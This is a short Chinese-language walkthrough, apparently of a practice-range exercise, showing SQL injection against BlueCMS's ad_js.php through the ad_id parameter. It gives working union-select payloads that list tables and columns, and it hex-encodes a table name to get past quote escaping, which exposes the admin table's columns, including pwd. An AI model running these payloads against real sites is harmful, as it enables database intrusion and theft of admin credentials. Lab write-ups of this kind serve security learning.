靶場地址

http://59.63.200.79:8003/bluecms/uploads/

百度查詢了bluecms的相關漏洞

發現存在sql注入，且sql注入點在如下網頁

http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1

經過探測，發現欄位數是7個

http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,database()

發現是可以爆出資料庫相關資訊的

爆表名

?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

document.write("blue_ad,blue_ad_phone,blue_admin,blue_admin_log,blue_ann,blue_ann_cat,blue_arc_cat,blue_area,blue_article,blue_attachment,blue_buy_record,blue_card_order,blue_card_type,blue_category,blue_comment,blue_config,blue_flash_image,blue_guest_book,blue_ipbanned,blue_link,blue_model,blue_navigate,blue_pay,blue_post,blue_post_att,blue_post_pic,blue_service,blue_task,blue_user");

根據上面爆出來的資料，我發現有兩個敏感的表名,blue_admin，blue_admin_log

爆欄位

但是我這裡遇到了問題

?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='blue_admin')--+

初步判斷是因為轉義的原因，看到 \ 反斜槓，突然感覺有點像寬位元組注入。

但錯誤並沒有解決，我去掉單引號後，識別出來的是這樣的

table_name=遙lue_admin�

這導致sql語句不正常。

我想到用編碼的方式試一下。

?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x626c75655f61646d696e)--+


document.write("admin_id,admin_name,email,pwd,purview,add_time,last_login_time,last_login_ip");

頁面無報錯，爆出欄位